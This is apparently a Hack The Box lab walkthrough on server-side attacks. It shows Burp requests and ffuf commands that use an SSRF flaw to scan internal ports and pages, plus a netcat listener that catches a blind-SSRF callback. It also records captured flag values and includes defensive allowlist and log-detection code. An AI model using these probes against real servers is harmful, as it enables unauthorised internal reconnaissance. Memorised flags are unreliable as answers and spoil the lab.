SERVER-SIDE ATTACKS

IDENTIFYING SSRF

Exploit an SSRF vulnerability to identify an internal web application. Access the internal application to obtain the flag.
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1:80&date=2024-01-02
   - change the port number to determine which ports are closed; the error message returned
     for a closed port is then used as the ffuf filter to separate open from closed services
      - "Failed to connect..."
   
#AUTOMATED
root@oco:~$ seq 1 10000 > ports.txt
root@oco:~$ ffuf -w ./ports.txt -u http://{targetSite:port}/{targetPage}.{tld} -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://127.0.0.1:FUZZ/&date=2024-01-01" -fr "Failed to connect to"
 * -fr means filter regexp
 * 80   [Status: 200, Size: 8285, Words: 2151, Lines: 158, Duration: 6095ms]
   3306 [Status: 200, Size: 45, Words: 7, Lines: 1, Duration: 14ms]
   8000 [Status: 200, Size: 37, Words: 1, Lines: 1, Duration: 51ms]

BURP > Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1:8000&date=2024-01-02

 * HTB{911fc5badf7d65aed95380d536c270f8}
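Defender's view of the same bug (added example, not part of the HTB module): the `dateserver` parameter is only ever meant to reach one upstream host, so the fix is to validate the submitted URL against an allowlist before the server fetches it. The allowed host, scheme and port below are assumptions; the resolved-address check rejects loopback and link-local targets, which is exactly what the `http://127.0.0.1:PORT` probes above rely on. The `resolve` hook exists so the check can be exercised offline with a fake resolver.

```python
"""Allowlist validation for a server-side fetch parameter (added example).

Assumptions (not from the module): the application only needs to reach
dateserver.htb over plain HTTP on port 80, and its upstream may sit on an
internal (RFC 1918) address, so only loopback/link-local/multicast/unspecified
destinations are rejected here. An internet-facing app whose upstream is public
would additionally reject ip.is_private.
"""
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_HOSTS = {"dateserver.htb"}   # assumption: the only legitimate upstream
ALLOWED_SCHEMES = {"http"}
ALLOWED_PORTS = {80}


def _is_acceptable_address(ip_text):
    """Reject addresses that would turn the fetch into a probe of the host itself
    or of its link-local neighbourhood (cloud metadata lives on 169.254.169.254)."""
    ip = ipaddress.ip_address(ip_text)
    return not (ip.is_loopback or ip.is_link_local or ip.is_multicast
                or ip.is_unspecified or ip.is_reserved)


def validate_upstream(url, resolve=socket.gethostbyname):
    """Return (ok, reason) for a user-supplied upstream URL.

    Checks run in order: parseable, allowed scheme, no userinfo (blocks
    http://dateserver.htb@127.0.0.1/ tricks), allowlisted host, allowlisted
    port, and finally the address the host resolves to right now.
    """
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, f"unparseable url: {exc}"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parts.username or parts.password:
        return False, "credentials in url"
    host = parts.hostname
    if host is None or host.lower() not in ALLOWED_HOSTS:
        return False, "host not in allowlist"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    if port is None:
        port = 80
    if port not in ALLOWED_PORTS:
        return False, "port not allowed"
    try:
        ip = resolve(host)
    except OSError as exc:
        return False, f"dns failure: {exc}"
    if not _is_acceptable_address(ip):
        return False, f"host resolves to disallowed address {ip}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs; the fake resolver stands in for DNS so this runs offline.
    fake_dns = lambda h: "172.17.0.3"
    for candidate in ("http://dateserver.htb/availability.php",
                      "http://127.0.0.1:80",
                      "http://dateserver.htb:8000/",
                      "http://dateserver.htb@127.0.0.1/",
                      "file:///etc/passwd"):
        print(candidate, "->", validate_upstream(candidate, resolve=fake_dns))
```

Note that the resolved-address check happens at validation time; the fetch itself should pin the connection to that same address (or re-validate on every redirect), otherwise a DNS answer that changes between check and use still gets through.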

EXPLOITING SSRF

Exploit the SSRF vulnerability to identify an additional endpoint. Access that endpoint to obtain the flag.
#identify potential SSRF vulnerability
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1/index.php&date=2024-01-02
 Response
  ...
  HTTP/1.1 200 OK
   - valid SSRF identified
   
#perform page fuzzing
#determine the web server's response on a non-existing page
BURP > Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/invalidPage.php&date=2024-01-02
   - a "404 Not Found" error message could be used as the filter, but it would not filter
     HTTP 403 responses; to catch both, filter on "Server at dateserver.htb Port 80", the
     footer string the web server's error pages share

root@oco:~$ ffuf -w directory-list-2.3-small.txt -u http://10.129.130.198/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://dateserver.htb/FUZZ.php&date=2024-01-01" -fr "Server at dateserver.htb Port 80" -e .php -v -ic -t 100
 * HTB{61ea58507c2b9da30465b9582d6782a1}

BLIND SSRF

Exploit the SSRF to identify open ports on the system. Which port is open in addition to port 80?
#identify blind ssrf
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1/index.php&date=2024-01-02
   - SSRF can be validated if the URL can be changed to point to another URL;
     if the response reports no error, then there is an SSRF vulnerability
      - changing the default URL in the dateserver parameter to http://127.0.0.1/index.php
        tests whether the web application responds without error
      - this method also tests whether the SSRF vulnerability is blind or not
 Response
  ...
  Date is unavailable. Choose a different date!
  
#verifying blind SSRF with Netcat
root@oco:~$ nc -nlvp 8080

root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://{attackerIP:port}&date=2024-01-02
   - pointing the dateserver parameter at the attacker-controlled listener confirms that the
     server makes the outbound request even when the response shows nothing about it
      - if the Netcat listener receives a connection, the SSRF is confirmed as blind:
        the request is made, but its result is not reflected in the response

#Netcat listener output
 connect to {attackerIP} from (UNKNOWN) [172.17.0.2] 32928
 GET /index.php HTTP/1.1
 Host: 172.17.0.1:8000
 Accept: */*

#open/close port enumeration
root@oco:~$ burpsuite
root@oco:~$ BROWSER > FoxyProxy > Burp
root@oco:~$ BURP SUITE > Proxy > Intercept is on
root@oco:~$ BROWSER > {targetSite:port}
 input field: submit the expected user input
 
BURP > Proxy > Intercept > Raw
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://dateserver.htb/availability.php&date=2024-01-01

#identify closed ports
BURP > Proxy > Intercept > Raw > right-click > Send to Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1:81&date=2024-01-02
   - the error message returned for closed ports is used as the ffuf filter to identify open ports
      - "Something went wrong..."
          - the error messages for open and closed ports differ

#identify open ports
BURP > Repeater
 Request
  ...
  POST /index.php HTTP/1.1
  content-type: application/x-www-form-urlencoded
  dateserver=http://127.0.0.1:80&date=2024-01-02
   - change the port number to determine which ports are closed
      - the error message returned for closed ports is used as the ffuf filter to identify open ports
         - "Date is unavailable. Choose a different date..."
             - the error messages for open and closed ports differ

#AUTOMATED
root@oco:~$ seq 1 10000 > ports.txt
root@oco:~$ ffuf -w ./ports.txt -u http://10.129.146.231/index.php -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "dateserver=http://127.0.0.1:FUZZ/&date=2024-01-01" -fr "Something went wrong"
 * -fr means filter regexp
 * 80    [Status: 200, Size: 52, Words: 8, Lines: 1, Duration: 8ms]
   5000  [Status: 200, Size: 52, Words: 8, Lines: 1, Duration: 12ms]
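Detection side of the port sweep above (added example, not part of the HTB module): a `seq 1 10000` run through ffuf leaves a burst of requests from one client whose `dateserver` value walks through ports on 127.0.0.1, and the blind-SSRF callback leaves a single request pointing at an address that is not the expected upstream at all. The log format below is constructed (an application log that records the client and the submitted `dateserver` value); the expected host, threshold and window are assumptions to tune per deployment.

```python
"""Flag SSRF probing in an application log (added example).

Constructed log format, one event per line:
  <ISO-8601 ts> client=<ip> dateserver=<submitted url> status=<code>
Two findings are produced:
  unexpected-host  any request whose target host is not EXPECTED_HOST
  port-sweep       one client hitting >= SWEEP_THRESHOLD distinct ports on the
                   same host inside WINDOW (the ffuf pattern on the page)
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlsplit

EXPECTED_HOST = "dateserver.htb"   # assumption: the only legitimate upstream
SWEEP_THRESHOLD = 5                # assumption: distinct ports per client per window
WINDOW = timedelta(minutes=1)      # assumption

LINE_RE = re.compile(r"^(?P<ts>\S+) client=(?P<client>\S+) dateserver=(?P<url>\S+)")

# Constructed sample: one legitimate request, a six-port sweep of loopback from
# 10.10.14.5, and a single callback-style request from 10.10.14.7 to itself.
SAMPLE_LOG = """\
2024-01-02T10:00:00Z client=10.10.14.9 dateserver=http://dateserver.htb/availability.php status=200
2024-01-02T10:00:05Z client=10.10.14.5 dateserver=http://127.0.0.1:80/ status=200
2024-01-02T10:00:05Z client=10.10.14.5 dateserver=http://127.0.0.1:81/ status=200
2024-01-02T10:00:06Z client=10.10.14.5 dateserver=http://127.0.0.1:82/ status=200
2024-01-02T10:00:06Z client=10.10.14.5 dateserver=http://127.0.0.1:83/ status=200
2024-01-02T10:00:07Z client=10.10.14.5 dateserver=http://127.0.0.1:84/ status=200
2024-01-02T10:00:07Z client=10.10.14.5 dateserver=http://127.0.0.1:85/ status=200
2024-01-02T10:00:30Z client=10.10.14.7 dateserver=http://10.10.14.7:8080/ status=200
"""


def parse_line(line):
    """Return an event dict or None for lines that do not match the format."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    try:
        port = parts.port
    except ValueError:
        port = None                      # malformed port: still worth keeping the event
    if port is None:
        port = 80
    return {
        "ts": datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ"),
        "client": m.group("client"),
        "url": m.group("url"),
        "host": (parts.hostname or "").lower(),
        "port": port,
    }


def detect(log_text):
    """Run both detections over the log text and return a list of findings."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    findings = []
    per_target = defaultdict(list)       # (client, host) -> [(ts, port), ...]
    for e in events:
        if e["host"] != EXPECTED_HOST:
            findings.append({"kind": "unexpected-host", "client": e["client"],
                             "url": e["url"], "ts": e["ts"].isoformat()})
        per_target[(e["client"], e["host"])].append((e["ts"], e["port"]))

    # Sliding window over each client/host pair: count distinct ports within WINDOW.
    for (client, host), hits in per_target.items():
        hits.sort()
        best, lo = 0, 0
        for hi in range(len(hits)):
            while hits[hi][0] - hits[lo][0] > WINDOW:
                lo += 1
            best = max(best, len({p for _, p in hits[lo:hi + 1]}))
        if best >= SWEEP_THRESHOLD:
            findings.append({"kind": "port-sweep", "client": client,
                             "host": host, "distinct_ports": best})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG):
        print(f)
```

The sweep detector is deliberately keyed on distinct ports rather than request count, so a legitimate client retrying the real upstream many times does not trip it; the unexpected-host rule fires on a single request, which is the right sensitivity once the allowlist is known, and the same events would also show up as outbound connection attempts to loopback in host-level telemetry.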

IDENTIFYING SSTI

Apply what you learned in this section and identify the Template Engine used by the web application. Provide the name of the template engine as the answer.

EXPLOITING JINJA2 SSTI

Exploit the SSTI vulnerability to obtain RCE and read the flag.

EXPLOITING TWIG SSTI

Exploit the SSTI vulnerability to obtain RCE and read the flag.

EXPLOITING SSI INJECTION

Exploit the SSI Injection vulnerability to obtain RCE and read the flag.

EXPLOITING XSLT INJECTION

Exploit the XSLT Injection vulnerability to obtain RCE and read the flag.
